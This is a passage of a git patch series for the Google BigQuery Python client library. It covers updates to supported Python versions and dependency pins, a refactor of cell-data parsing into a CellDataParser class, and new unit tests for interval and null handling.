session.run("python", "-m", "pip", "freeze") diff --git a/owlbot.py b/owlbot.py index c8efaa98d..fceeaa1b6 100644 --- a/owlbot.py +++ b/owlbot.py @@ -55,6 +55,9 @@ "geopandas": "https://geopandas.org/", "pandas": "https://pandas.pydata.org/pandas-docs/stable/", }, + system_test_python_versions=["3.9", "3.13"], + unit_test_python_versions=["3.9", "3.10", "3.11", "3.12", "3.13"], + default_python_version="3.9", ) # BigQuery has a custom multiprocessing note @@ -86,41 +89,13 @@ python3.9 -m pip install --upgrade --quiet nox virtualenv==20.26.6""", "python3.9 -m pip install --upgrade --quiet nox virtualenv", ) -s.replace( - "CONTRIBUTING.rst", - "3.7, 3.8, 3.9, 3.10, 3.11, 3.12 and 3.13 on both UNIX and Windows.", - "3.9, 3.10, 3.11, 3.12 and 3.13 on both UNIX and Windows.", -) -s.replace( - "CONTRIBUTING.rst", - r" \$ nox -s system-3.8 -- -k ", - r" $ nox -s system-3.9 -- -k ", -) -s.replace( - "CONTRIBUTING.rst", - r"""System tests are only configured to run under Python 3.8. - For expediency, we do not run them in older versions of Python 3.""", - r"System tests are configured to run under Python 3.9, 3.11, 3.12.", -) + s.replace( "CONTRIBUTING.rst", r"\$ nox -s py-3.8", r"$ nox -s py-3.9", ) -s.replace( - "CONTRIBUTING.rst", - r"""- `Python 3.7`_ -- `Python 3.8`_ -""", - r"", -) -s.replace( - "CONTRIBUTING.rst", - r""".. _Python 3.7: https://docs.python.org/3.7/ -.. 
_Python 3.8: https://docs.python.org/3.8/ -""", - r"", -) + s.replace( "scripts/readme-gen/templates/install_deps.tmpl.rst", r"Samples are compatible with Python 3.7", diff --git a/pyproject.toml b/pyproject.toml index 8822fc57d..17bf4fd20 100644 --- a/pyproject.toml +++ b/pyproject.toml @@ -37,17 +37,18 @@ classifiers = [ "Programming Language :: Python :: 3.10", "Programming Language :: Python :: 3.11", "Programming Language :: Python :: 3.12", + "Programming Language :: Python :: 3.13", "Operating System :: OS Independent", "Topic :: Internet", ] dependencies = [ - "google-api-core[grpc] >= 2.11.1, < 3.0.0dev", - "google-auth >= 2.14.1, < 3.0.0dev", - "google-cloud-core >= 2.4.1, < 3.0.0dev", - "google-resumable-media >= 2.0.0, < 3.0dev", + "google-api-core[grpc] >= 2.11.1, < 3.0.0", + "google-auth >= 2.14.1, < 3.0.0", + "google-cloud-core >= 2.4.1, < 3.0.0", + "google-resumable-media >= 2.0.0, < 3.0.0", "packaging >= 24.2.0", - "python-dateutil >= 2.8.2, < 3.0dev", - "requests >= 2.21.0, < 3.0.0dev", + "python-dateutil >= 2.8.2, < 3.0.0", + "requests >= 2.21.0, < 3.0.0", ] dynamic = ["version"] @@ -59,37 +60,37 @@ Repository = "https://github.com/googleapis/python-bigquery" # moved back to optional due to bloat. See # https://github.com/googleapis/python-bigquery/issues/1196 for more background. bqstorage = [ - "google-cloud-bigquery-storage >= 2.18.0, < 3.0.0dev", + "google-cloud-bigquery-storage >= 2.18.0, < 3.0.0", # Due to an issue in pip's dependency resolver, the `grpc` extra is not # installed, even though `google-cloud-bigquery-storage` specifies it # as `google-api-core[grpc]`. We thus need to explicitly specify it here. # See: https://github.com/googleapis/python-bigquery/issues/83 The # grpc.Channel.close() method isn't added until 1.32.0. 
# https://github.com/grpc/grpc/pull/15254 - "grpcio >= 1.47.0, < 2.0dev", - "grpcio >= 1.49.1, < 2.0dev; python_version >= '3.11'", + "grpcio >= 1.47.0, < 2.0.0", + "grpcio >= 1.49.1, < 2.0.0; python_version >= '3.11'", "pyarrow >= 4.0.0", ] pandas = [ "pandas >= 1.1.4", - "pandas-gbq >= 0.26.1; python_version >= '3.8'", - "grpcio >= 1.47.0, < 2.0dev", - "grpcio >= 1.49.1, < 2.0dev; python_version >= '3.11'", + "pandas-gbq >= 0.26.1", + "grpcio >= 1.47.0, < 2.0.0", + "grpcio >= 1.49.1, < 2.0.0; python_version >= '3.11'", "pyarrow >= 3.0.0", - "db-dtypes >= 1.0.4, < 2.0.0dev", + "db-dtypes >= 1.0.4, < 2.0.0", ] ipywidgets = ["ipywidgets >= 7.7.1", "ipykernel >= 6.2.0"] -geopandas = ["geopandas >= 0.9.0, < 2.0dev", "Shapely >= 1.8.4, < 3.0.0dev"] +geopandas = ["geopandas >= 0.9.0, < 2.0.0", "Shapely >= 1.8.4, < 3.0.0"] ipython = ["ipython >= 7.23.1", "bigquery-magics >= 0.6.0"] -tqdm = ["tqdm >= 4.7.4, < 5.0.0dev"] +tqdm = ["tqdm >= 4.7.4, < 5.0.0"] opentelemetry = [ "opentelemetry-api >= 1.1.0", "opentelemetry-sdk >= 1.1.0", "opentelemetry-instrumentation >= 0.20b0", ] bigquery_v2 = [ - "proto-plus >= 1.22.3, < 2.0.0dev", - "protobuf >= 3.20.2, < 6.0.0dev, != 4.21.0, != 4.21.1, != 4.21.2, != 4.21.3, != 4.21.4, != 4.21.5", # For the legacy proto-based types. + "proto-plus >= 1.22.3, < 2.0.0", + "protobuf >= 3.20.2, < 7.0.0, != 4.21.0, != 4.21.1, != 4.21.2, != 4.21.3, != 4.21.4, != 4.21.5", # For the legacy proto-based types. 
] all = [ "google-cloud-bigquery[bqstorage,pandas,ipywidgets,geopandas,ipython,tqdm,opentelemetry,bigquery_v2]", diff --git a/testing/constraints-3.13.txt b/testing/constraints-3.13.txt new file mode 100644 index 000000000..e69de29bb From 9acd9c15a18bb2c0ff9d12d306598a23a80a5b11 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Tim=20Swe=C3=B1a=20=28Swast=29?= Date: Wed, 19 Mar 2025 10:17:38 -0500 Subject: [PATCH 076/202] chore: refactor cell data parsing to use classes for easier overrides (#2144) * chore: refactor cell data parsing to use classes for easier overrides * improve error messages with urls for valueerrors * Update tests/unit/_helpers/test_cell_data_parser.py * remove unreachable code --- google/cloud/bigquery/_helpers.py | 499 ++++++++++-------- google/cloud/bigquery/query.py | 27 +- google/cloud/bigquery/table.py | 2 +- tests/unit/_helpers/test_cell_data_parser.py | 467 ++++++++++++++++ tests/unit/_helpers/test_from_json.py | 157 ------ .../test_scalar_query_param_parser.py | 93 ++++ tests/unit/test__helpers.py | 479 ----------------- 7 files changed, 858 insertions(+), 866 deletions(-) create mode 100644 tests/unit/_helpers/test_cell_data_parser.py delete mode 100644 tests/unit/_helpers/test_from_json.py create mode 100644 tests/unit/_helpers/test_scalar_query_param_parser.py diff --git a/google/cloud/bigquery/_helpers.py b/google/cloud/bigquery/_helpers.py index d40217c4d..4ba3ccf93 100644 --- a/google/cloud/bigquery/_helpers.py +++ b/google/cloud/bigquery/_helpers.py @@ -21,8 +21,9 @@ import math import re import os +import textwrap import warnings -from typing import Optional, Union, Any, Tuple, Type +from typing import Any, Optional, Tuple, Type, Union from dateutil import relativedelta from google.cloud._helpers import UTC # type: ignore @@ -133,243 +134,305 @@ def _not_null(value, field): return value is not None or (field is not None and field.mode != "NULLABLE") -def _int_from_json(value, field): - """Coerce 'value' to an int, if set or not 
nullable.""" - if _not_null(value, field): - return int(value) - - -def _interval_from_json( - value: Optional[str], field -) -> Optional[relativedelta.relativedelta]: - """Coerce 'value' to an interval, if set or not nullable.""" - if not _not_null(value, field): - return None - if value is None: - raise TypeError(f"got {value} for REQUIRED field: {repr(field)}") - - parsed = _INTERVAL_PATTERN.match(value) - if parsed is None: - raise ValueError(f"got interval: '{value}' with unexpected format") - - calendar_sign = -1 if parsed.group("calendar_sign") == "-" else 1 - years = calendar_sign * int(parsed.group("years")) - months = calendar_sign * int(parsed.group("months")) - days = int(parsed.group("days")) - time_sign = -1 if parsed.group("time_sign") == "-" else 1 - hours = time_sign * int(parsed.group("hours")) - minutes = time_sign * int(parsed.group("minutes")) - seconds = time_sign * int(parsed.group("seconds")) - fraction = parsed.group("fraction") - microseconds = time_sign * int(fraction.ljust(6, "0")[:6]) if fraction else 0 - - return relativedelta.relativedelta( - years=years, - months=months, - days=days, - hours=hours, - minutes=minutes, - seconds=seconds, - microseconds=microseconds, - ) - - -def _float_from_json(value, field): - """Coerce 'value' to a float, if set or not nullable.""" - if _not_null(value, field): - return float(value) - - -def _decimal_from_json(value, field): - """Coerce 'value' to a Decimal, if set or not nullable.""" - if _not_null(value, field): - return decimal.Decimal(value) - - -def _bool_from_json(value, field): - """Coerce 'value' to a bool, if set or not nullable.""" - if _not_null(value, field): - return value.lower() in ["t", "true", "1"] - - -def _string_from_json(value, _): - """NOOP string -> string coercion""" - return value - - -def _bytes_from_json(value, field): - """Base64-decode value""" - if _not_null(value, field): - return base64.standard_b64decode(_to_bytes(value)) - - -def _timestamp_from_json(value, field): 
- """Coerce 'value' to a datetime, if set or not nullable.""" - if _not_null(value, field): - # value will be a integer in seconds, to microsecond precision, in UTC. - return _datetime_from_microseconds(int(value)) +class CellDataParser: + """Converter from BigQuery REST resource to Python value for RowIterator and similar classes. + See: "rows" field of + https://cloud.google.com/bigquery/docs/reference/rest/v2/tabledata/list and + https://cloud.google.com/bigquery/docs/reference/rest/v2/jobs/getQueryResults. + """ -def _timestamp_query_param_from_json(value, field): - """Coerce 'value' to a datetime, if set or not nullable. - - Args: - value (str): The timestamp. - - field (google.cloud.bigquery.schema.SchemaField): - The field corresponding to the value. + def to_py(self, resource, field): + def default_converter(value, field): + _warn_unknown_field_type(field) + return value - Returns: - Optional[datetime.datetime]: - The parsed datetime object from - ``value`` if the ``field`` is not null (otherwise it is - :data:`None`). - """ - if _not_null(value, field): - # Canonical formats for timestamps in BigQuery are flexible. See: - # g.co/cloud/bigquery/docs/reference/standard-sql/data-types#timestamp-type - # The separator between the date and time can be 'T' or ' '. - value = value.replace(" ", "T", 1) - # The UTC timezone may be formatted as Z or +00:00. - value = value.replace("Z", "") - value = value.replace("+00:00", "") - - if "." 
in value: - # YYYY-MM-DDTHH:MM:SS.ffffff - return datetime.datetime.strptime(value, _RFC3339_MICROS_NO_ZULU).replace( - tzinfo=UTC - ) + converter = getattr( + self, f"{field.field_type.lower()}_to_py", default_converter + ) + if field.mode == "REPEATED": + return [converter(item["v"], field) for item in resource] else: - # YYYY-MM-DDTHH:MM:SS - return datetime.datetime.strptime(value, _RFC3339_NO_FRACTION).replace( - tzinfo=UTC + return converter(resource, field) + + def bool_to_py(self, value, field): + """Coerce 'value' to a bool, if set or not nullable.""" + if _not_null(value, field): + # TODO(tswast): Why does _not_null care if the field is NULLABLE or + # REQUIRED? Do we actually need such client-side validation? + if value is None: + raise TypeError(f"got None for required boolean field {field}") + return value.lower() in ("t", "true", "1") + + def boolean_to_py(self, value, field): + """Coerce 'value' to a bool, if set or not nullable.""" + return self.bool_to_py(value, field) + + def integer_to_py(self, value, field): + """Coerce 'value' to an int, if set or not nullable.""" + if _not_null(value, field): + return int(value) + + def int64_to_py(self, value, field): + """Coerce 'value' to an int, if set or not nullable.""" + return self.integer_to_py(value, field) + + def interval_to_py( + self, value: Optional[str], field + ) -> Optional[relativedelta.relativedelta]: + """Coerce 'value' to an interval, if set or not nullable.""" + if not _not_null(value, field): + return None + if value is None: + raise TypeError(f"got {value} for REQUIRED field: {repr(field)}") + + parsed = _INTERVAL_PATTERN.match(value) + if parsed is None: + raise ValueError( + textwrap.dedent( + f""" + Got interval: '{value}' with unexpected format. + Expected interval in canonical format of "[sign]Y-M [sign]D [sign]H:M:S[.F]". + See: + https://cloud.google.com/bigquery/docs/reference/standard-sql/data-types#interval_type + for more information. 
+ """ + ), ) - else: - return None + calendar_sign = -1 if parsed.group("calendar_sign") == "-" else 1 + years = calendar_sign * int(parsed.group("years")) + months = calendar_sign * int(parsed.group("months")) + days = int(parsed.group("days")) + time_sign = -1 if parsed.group("time_sign") == "-" else 1 + hours = time_sign * int(parsed.group("hours")) + minutes = time_sign * int(parsed.group("minutes")) + seconds = time_sign * int(parsed.group("seconds")) + fraction = parsed.group("fraction") + microseconds = time_sign * int(fraction.ljust(6, "0")[:6]) if fraction else 0 + + return relativedelta.relativedelta( + years=years, + months=months, + days=days, + hours=hours, + minutes=minutes, + seconds=seconds, + microseconds=microseconds, + ) -def _datetime_from_json(value, field): - """Coerce 'value' to a datetime, if set or not nullable. + def float_to_py(self, value, field): + """Coerce 'value' to a float, if set or not nullable.""" + if _not_null(value, field): + return float(value) - Args: - value (str): The timestamp. - field (google.cloud.bigquery.schema.SchemaField): - The field corresponding to the value. + def float64_to_py(self, value, field): + """Coerce 'value' to a float, if set or not nullable.""" + return self.float_to_py(value, field) - Returns: - Optional[datetime.datetime]: - The parsed datetime object from - ``value`` if the ``field`` is not null (otherwise it is - :data:`None`). - """ - if _not_null(value, field): - if "." 
in value: - # YYYY-MM-DDTHH:MM:SS.ffffff - return datetime.datetime.strptime(value, _RFC3339_MICROS_NO_ZULU) - else: - # YYYY-MM-DDTHH:MM:SS - return datetime.datetime.strptime(value, _RFC3339_NO_FRACTION) - else: - return None + def numeric_to_py(self, value, field): + """Coerce 'value' to a Decimal, if set or not nullable.""" + if _not_null(value, field): + return decimal.Decimal(value) + def bignumeric_to_py(self, value, field): + """Coerce 'value' to a Decimal, if set or not nullable.""" + return self.numeric_to_py(value, field) -def _date_from_json(value, field): - """Coerce 'value' to a datetime date, if set or not nullable""" - if _not_null(value, field): - # value will be a string, in YYYY-MM-DD form. - return _date_from_iso8601_date(value) + def string_to_py(self, value, _): + """NOOP string -> string coercion""" + return value + def geography_to_py(self, value, _): + """NOOP string -> string coercion""" + return value -def _time_from_json(value, field): - """Coerce 'value' to a datetime date, if set or not nullable""" - if _not_null(value, field): - if len(value) == 8: # HH:MM:SS - fmt = _TIMEONLY_WO_MICROS - elif len(value) == 15: # HH:MM:SS.micros - fmt = _TIMEONLY_W_MICROS + def bytes_to_py(self, value, field): + """Base64-decode value""" + if _not_null(value, field): + return base64.standard_b64decode(_to_bytes(value)) + + def timestamp_to_py(self, value, field): + """Coerce 'value' to a datetime, if set or not nullable.""" + if _not_null(value, field): + # value will be a integer in seconds, to microsecond precision, in UTC. + return _datetime_from_microseconds(int(value)) + + def datetime_to_py(self, value, field): + """Coerce 'value' to a datetime, if set or not nullable. + + Args: + value (str): The timestamp. + field (google.cloud.bigquery.schema.SchemaField): + The field corresponding to the value. 
+ + Returns: + Optional[datetime.datetime]: + The parsed datetime object from + ``value`` if the ``field`` is not null (otherwise it is + :data:`None`). + """ + if _not_null(value, field): + if "." in value: + # YYYY-MM-DDTHH:MM:SS.ffffff + return datetime.datetime.strptime(value, _RFC3339_MICROS_NO_ZULU) + else: + # YYYY-MM-DDTHH:MM:SS + return datetime.datetime.strptime(value, _RFC3339_NO_FRACTION) else: - raise ValueError("Unknown time format: {}".format(value)) - return datetime.datetime.strptime(value, fmt).time() + return None + def date_to_py(self, value, field): + """Coerce 'value' to a datetime date, if set or not nullable""" + if _not_null(value, field): + # value will be a string, in YYYY-MM-DD form. + return _date_from_iso8601_date(value) + + def time_to_py(self, value, field): + """Coerce 'value' to a datetime date, if set or not nullable""" + if _not_null(value, field): + if len(value) == 8: # HH:MM:SS + fmt = _TIMEONLY_WO_MICROS + elif len(value) == 15: # HH:MM:SS.micros + fmt = _TIMEONLY_W_MICROS + else: + raise ValueError( + textwrap.dedent( + f""" + Got {repr(value)} with unknown time format. + Expected HH:MM:SS or HH:MM:SS.micros. See + https://cloud.google.com/bigquery/docs/reference/standard-sql/data-types#time_type + for more information. 
+ """ + ), + ) + return datetime.datetime.strptime(value, fmt).time() + + def record_to_py(self, value, field): + """Coerce 'value' to a mapping, if set or not nullable.""" + if _not_null(value, field): + record = {} + record_iter = zip(field.fields, value["f"]) + for subfield, cell in record_iter: + record[subfield.name] = self.to_py(cell["v"], subfield) + return record + + def struct_to_py(self, value, field): + """Coerce 'value' to a mapping, if set or not nullable.""" + return self.record_to_py(value, field) + + def json_to_py(self, value, field): + """Coerce 'value' to a Pythonic JSON representation.""" + if _not_null(value, field): + return json.loads(value) + else: + return None -def _record_from_json(value, field): - """Coerce 'value' to a mapping, if set or not nullable.""" - if _not_null(value, field): - record = {} - record_iter = zip(field.fields, value["f"]) - for subfield, cell in record_iter: - record[subfield.name] = _field_from_json(cell["v"], subfield) - return record + def _range_element_to_py(self, value, field_element_type): + """Coerce 'value' to a range element value.""" + # Avoid circular imports by importing here. + from google.cloud.bigquery import schema + if value == "UNBOUNDED": + return None + if field_element_type.element_type in _SUPPORTED_RANGE_ELEMENTS: + return self.to_py( + value, + schema.SchemaField("placeholder", field_element_type.element_type), + ) + else: + raise ValueError( + textwrap.dedent( + f""" + Got unsupported range element type: {field_element_type.element_type}. + Exptected one of {repr(_SUPPORTED_RANGE_ELEMENTS)}. See: + https://cloud.google.com/bigquery/docs/reference/standard-sql/data-types#declare_a_range_type + for more information. 
+ """ + ), + ) -def _json_from_json(value, field): - """Coerce 'value' to a Pythonic JSON representation.""" - if _not_null(value, field): - return json.loads(value) - else: - return None + def range_to_py(self, value, field): + """Coerce 'value' to a range, if set or not nullable. + + Args: + value (str): The literal representation of the range. + field (google.cloud.bigquery.schema.SchemaField): + The field corresponding to the value. + + Returns: + Optional[dict]: + The parsed range object from ``value`` if the ``field`` is not + null (otherwise it is :data:`None`). + """ + if _not_null(value, field): + if _RANGE_PATTERN.match(value): + start, end = value[1:-1].split(", ") + start = self._range_element_to_py(start, field.range_element_type) + end = self._range_element_to_py(end, field.range_element_type) + return {"start": start, "end": end} + else: + raise ValueError( + textwrap.dedent( + f""" + Got unknown format for range value: {value}. + Expected format '[lower_bound, upper_bound)'. See: + https://cloud.google.com/bigquery/docs/reference/standard-sql/data-types#range_with_literal + for more information. + """ + ), + ) -def _range_element_from_json(value, field): - """Coerce 'value' to a range element value.""" - if value == "UNBOUNDED": - return None - if field.element_type in _SUPPORTED_RANGE_ELEMENTS: - return _CELLDATA_FROM_JSON[field.element_type](value, field.element_type) - else: - raise ValueError(f"Unsupported range element type: {field.element_type}") +CELL_DATA_PARSER = CellDataParser() -def _range_from_json(value, field): - """Coerce 'value' to a range, if set or not nullable. +class ScalarQueryParamParser(CellDataParser): + """Override of CellDataParser to handle the differences in the response from query params. - Args: - value (str): The literal representation of the range. - field (google.cloud.bigquery.schema.SchemaField): - The field corresponding to the value. 
- - Returns: - Optional[dict]: - The parsed range object from ``value`` if the ``field`` is not - null (otherwise it is :data:`None`). + See: "value" field of + https://cloud.google.com/bigquery/docs/reference/rest/v2/QueryParameter#QueryParameterValue """ - if _not_null(value, field): - if _RANGE_PATTERN.match(value): - start, end = value[1:-1].split(", ") - start = _range_element_from_json(start, field.range_element_type) - end = _range_element_from_json(end, field.range_element_type) - return {"start": start, "end": end} - else: - raise ValueError(f"Unknown format for range value: {value}") - else: - return None + def timestamp_to_py(self, value, field): + """Coerce 'value' to a datetime, if set or not nullable. + + Args: + value (str): The timestamp. + + field (google.cloud.bigquery.schema.SchemaField): + The field corresponding to the value. + + Returns: + Optional[datetime.datetime]: + The parsed datetime object from + ``value`` if the ``field`` is not null (otherwise it is + :data:`None`). + """ + if _not_null(value, field): + # Canonical formats for timestamps in BigQuery are flexible. See: + # g.co/cloud/bigquery/docs/reference/standard-sql/data-types#timestamp-type + # The separator between the date and time can be 'T' or ' '. + value = value.replace(" ", "T", 1) + # The UTC timezone may be formatted as Z or +00:00. + value = value.replace("Z", "") + value = value.replace("+00:00", "") + + if "." in value: + # YYYY-MM-DDTHH:MM:SS.ffffff + return datetime.datetime.strptime( + value, _RFC3339_MICROS_NO_ZULU + ).replace(tzinfo=UTC) + else: + # YYYY-MM-DDTHH:MM:SS + return datetime.datetime.strptime(value, _RFC3339_NO_FRACTION).replace( + tzinfo=UTC + ) + else: + return None -# Parse BigQuery API response JSON into a Python representation. 
-_CELLDATA_FROM_JSON = { - "INTEGER": _int_from_json, - "INT64": _int_from_json, - "INTERVAL": _interval_from_json, - "FLOAT": _float_from_json, - "FLOAT64": _float_from_json, - "NUMERIC": _decimal_from_json, - "BIGNUMERIC": _decimal_from_json, - "BOOLEAN": _bool_from_json, - "BOOL": _bool_from_json, - "STRING": _string_from_json, - "GEOGRAPHY": _string_from_json, - "BYTES": _bytes_from_json, - "TIMESTAMP": _timestamp_from_json, - "DATETIME": _datetime_from_json, - "DATE": _date_from_json, - "TIME": _time_from_json, - "RECORD": _record_from_json, - "JSON": _json_from_json, - "RANGE": _range_from_json, -} -_QUERY_PARAMS_FROM_JSON = dict(_CELLDATA_FROM_JSON) -_QUERY_PARAMS_FROM_JSON["TIMESTAMP"] = _timestamp_query_param_from_json +SCALAR_QUERY_PARAM_PARSER = ScalarQueryParamParser() def _field_to_index_mapping(schema): @@ -377,18 +440,6 @@ def _field_to_index_mapping(schema): return {f.name: i for i, f in enumerate(schema)} -def _field_from_json(resource, field): - def default_converter(value, field): - _warn_unknown_field_type(field) - return value - - converter = _CELLDATA_FROM_JSON.get(field.field_type, default_converter) - if field.mode == "REPEATED": - return [converter(item["v"], field) for item in resource] - else: - return converter(resource, field) - - def _row_tuple_from_json(row, schema): """Convert JSON row data to row with appropriate types. 
@@ -410,7 +461,7 @@ def _row_tuple_from_json(row, schema): row_data = [] for field, cell in zip(schema, row["f"]): - row_data.append(_field_from_json(cell["v"], field)) + row_data.append(CELL_DATA_PARSER.to_py(cell["v"], field)) return tuple(row_data) diff --git a/google/cloud/bigquery/query.py b/google/cloud/bigquery/query.py index f1090a7dc..8745c09f5 100644 --- a/google/cloud/bigquery/query.py +++ b/google/cloud/bigquery/query.py @@ -18,11 +18,11 @@ import copy import datetime import decimal -from typing import Any, Optional, Dict, Union +from typing import Any, cast, Optional, Dict, Union from google.cloud.bigquery.table import _parse_schema_resource +from google.cloud.bigquery import _helpers from google.cloud.bigquery._helpers import _rows_from_json -from google.cloud.bigquery._helpers import _QUERY_PARAMS_FROM_JSON from google.cloud.bigquery._helpers import _SCALAR_VALUE_TO_JSON_PARAM from google.cloud.bigquery._helpers import _SUPPORTED_RANGE_ELEMENTS @@ -571,6 +571,9 @@ def from_api_repr(cls, resource: dict) -> "ScalarQueryParameter": Returns: google.cloud.bigquery.query.ScalarQueryParameter: Instance """ + # Import here to avoid circular imports. + from google.cloud.bigquery import schema + name = resource.get("name") type_ = resource["parameterType"]["type"] @@ -578,7 +581,9 @@ def from_api_repr(cls, resource: dict) -> "ScalarQueryParameter": # from the back-end - the latter omits it for None values. value = resource.get("parameterValue", {}).get("value") if value is not None: - converted = _QUERY_PARAMS_FROM_JSON[type_](value, None) + converted = _helpers.SCALAR_QUERY_PARAM_PARSER.to_py( + value, schema.SchemaField(cast(str, name), type_) + ) else: converted = None @@ -693,13 +698,20 @@ def _from_api_repr_struct(cls, resource): @classmethod def _from_api_repr_scalar(cls, resource): + """Converts REST resource into a list of scalar values.""" + # Import here to avoid circular imports. 
+ from google.cloud.bigquery import schema + name = resource.get("name") array_type = resource["parameterType"]["arrayType"]["type"] parameter_value = resource.get("parameterValue", {}) array_values = parameter_value.get("arrayValues", ()) values = [value["value"] for value in array_values] converted = [ - _QUERY_PARAMS_FROM_JSON[array_type](value, None) for value in values + _helpers.SCALAR_QUERY_PARAM_PARSER.to_py( + value, schema.SchemaField(name, array_type) + ) + for value in values ] return cls(name, array_type, converted) @@ -850,6 +862,9 @@ def from_api_repr(cls, resource: dict) -> "StructQueryParameter": Returns: google.cloud.bigquery.query.StructQueryParameter: Instance """ + # Import here to avoid circular imports. + from google.cloud.bigquery import schema + name = resource.get("name") instance = cls(name) type_resources = {} @@ -877,7 +892,9 @@ def from_api_repr(cls, resource: dict) -> "StructQueryParameter": converted = ArrayQueryParameter.from_api_repr(struct_resource) else: value = value["value"] - converted = _QUERY_PARAMS_FROM_JSON[type_](value, None) + converted = _helpers.SCALAR_QUERY_PARAM_PARSER.to_py( + value, schema.SchemaField(cast(str, name), type_) + ) instance.struct_values[key] = converted return instance diff --git a/google/cloud/bigquery/table.py b/google/cloud/bigquery/table.py index 4d79d60da..f139e44ad 100644 --- a/google/cloud/bigquery/table.py +++ b/google/cloud/bigquery/table.py @@ -3533,7 +3533,7 @@ def _row_iterator_page_columns(schema, response): def get_column_data(field_index, field): for row in rows: - yield _helpers._field_from_json(row["f"][field_index]["v"], field) + yield _helpers.CELL_DATA_PARSER.to_py(row["f"][field_index]["v"], field) for field_index, field in enumerate(schema): columns.append(get_column_data(field_index, field)) diff --git a/tests/unit/_helpers/test_cell_data_parser.py b/tests/unit/_helpers/test_cell_data_parser.py new file mode 100644 index 000000000..14721a26c --- /dev/null +++ 
b/tests/unit/_helpers/test_cell_data_parser.py @@ -0,0 +1,467 @@ +# Copyright 2025 Google LLC +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +import base64 +import datetime +import decimal +import json + +from dateutil.relativedelta import relativedelta +import pytest + +import google.cloud.bigquery.schema + + +def create_field(mode="NULLABLE", type_="IGNORED", name="test_field", **kwargs): + return google.cloud.bigquery.schema.SchemaField(name, type_, mode=mode, **kwargs) + + +@pytest.fixture +def mut(): + from google.cloud.bigquery import _helpers + + return _helpers + + +@pytest.fixture +def object_under_test(mut): + return mut.CELL_DATA_PARSER + + +ALL_TYPES = { + "BOOL", + "BOOLEAN", + "BYTES", + "INTEGER", + "INT64", + "INTERVAL", + "FLOAT", + "FLOAT64", + "NUMERIC", + "BIGNUMERIC", + "STRING", + "GEOGRAPHY", + "TIMESTAMP", + "DATETIME", + "DATE", + "TIME", + "RECORD", + "STRUCT", + "JSON", + "RANGE", +} + +TYPES_WITH_CLIENT_SIDE_NULL_VALIDATION = ALL_TYPES - { + "STRING", + "GEOGRAPHY", +} + + +@pytest.mark.parametrize( + "type_", + list(sorted(ALL_TYPES)), +) +def test_to_py_w_none_nullable(object_under_test, type_): + assert object_under_test.to_py(None, create_field("NULLABLE", type_)) is None + + +@pytest.mark.parametrize("type_", list(sorted(TYPES_WITH_CLIENT_SIDE_NULL_VALIDATION))) +def test_to_py_w_none_required(object_under_test, type_): + with pytest.raises(TypeError): + object_under_test.to_py(None, create_field("REQUIRED", type_)) + + +def 
test_interval_to_py_w_invalid_format(object_under_test): + with pytest.raises(ValueError, match="NOT_AN_INTERVAL"): + object_under_test.interval_to_py("NOT_AN_INTERVAL", create_field()) + + +@pytest.mark.parametrize( + ("value", "expected"), + ( + ("0-0 0 0:0:0", relativedelta()), + # SELECT INTERVAL X YEAR + ("-10000-0 0 0:0:0", relativedelta(years=-10000)), + ("-1-0 0 0:0:0", relativedelta(years=-1)), + ("1-0 0 0:0:0", relativedelta(years=1)), + ("10000-0 0 0:0:0", relativedelta(years=10000)), + # SELECT INTERVAL X MONTH + ("-0-11 0 0:0:0", relativedelta(months=-11)), + ("-0-1 0 0:0:0", relativedelta(months=-1)), + ("0-1 0 0:0:0", relativedelta(months=1)), + ("0-11 0 0:0:0", relativedelta(months=11)), + # SELECT INTERVAL X DAY + ("0-0 -3660000 0:0:0", relativedelta(days=-3660000)), + ("0-0 -1 0:0:0", relativedelta(days=-1)), + ("0-0 1 0:0:0", relativedelta(days=1)), + ("0-0 3660000 0:0:0", relativedelta(days=3660000)), + # SELECT INTERVAL X HOUR + ("0-0 0 -87840000:0:0", relativedelta(hours=-87840000)), + ("0-0 0 -1:0:0", relativedelta(hours=-1)), + ("0-0 0 1:0:0", relativedelta(hours=1)), + ("0-0 0 87840000:0:0", relativedelta(hours=87840000)), + # SELECT INTERVAL X MINUTE + ("0-0 0 -0:59:0", relativedelta(minutes=-59)), + ("0-0 0 -0:1:0", relativedelta(minutes=-1)), + ("0-0 0 0:1:0", relativedelta(minutes=1)), + ("0-0 0 0:59:0", relativedelta(minutes=59)), + # SELECT INTERVAL X SECOND + ("0-0 0 -0:0:59", relativedelta(seconds=-59)), + ("0-0 0 -0:0:1", relativedelta(seconds=-1)), + ("0-0 0 0:0:1", relativedelta(seconds=1)), + ("0-0 0 0:0:59", relativedelta(seconds=59)), + # SELECT (INTERVAL -1 SECOND) / 1000000 + ("0-0 0 -0:0:0.000001", relativedelta(microseconds=-1)), + ("0-0 0 -0:0:59.999999", relativedelta(seconds=-59, microseconds=-999999)), + ("0-0 0 -0:0:59.999", relativedelta(seconds=-59, microseconds=-999000)), + ("0-0 0 0:0:59.999", relativedelta(seconds=59, microseconds=999000)), + ("0-0 0 0:0:59.999999", relativedelta(seconds=59, 
microseconds=999999)), + # Test with multiple digits in each section. + ( + "32-11 45 67:16:23.987654", + relativedelta( + years=32, + months=11, + days=45, + hours=67, + minutes=16, + seconds=23, + microseconds=987654, + ), + ), + ( + "-32-11 -45 -67:16:23.987654", + relativedelta( + years=-32, + months=-11, + days=-45, + hours=-67, + minutes=-16, + seconds=-23, + microseconds=-987654, + ), + ), + # Test with mixed +/- sections. + ( + "9999-9 -999999 9999999:59:59.999999", + relativedelta( + years=9999, + months=9, + days=-999999, + hours=9999999, + minutes=59, + seconds=59, + microseconds=999999, + ), + ), + # Test with fraction that is not microseconds. + ("0-0 0 0:0:42.", relativedelta(seconds=42)), + ("0-0 0 0:0:59.1", relativedelta(seconds=59, microseconds=100000)), + ("0-0 0 0:0:0.12", relativedelta(microseconds=120000)), + ("0-0 0 0:0:0.123", relativedelta(microseconds=123000)), + ("0-0 0 0:0:0.1234", relativedelta(microseconds=123400)), + # Fractional seconds can cause rounding problems if cast to float. See: + # https://github.com/googleapis/python-db-dtypes-pandas/issues/18 + ("0-0 0 0:0:59.876543", relativedelta(seconds=59, microseconds=876543)), + ( + "0-0 0 01:01:01.010101", + relativedelta(hours=1, minutes=1, seconds=1, microseconds=10101), + ), + ( + "0-0 0 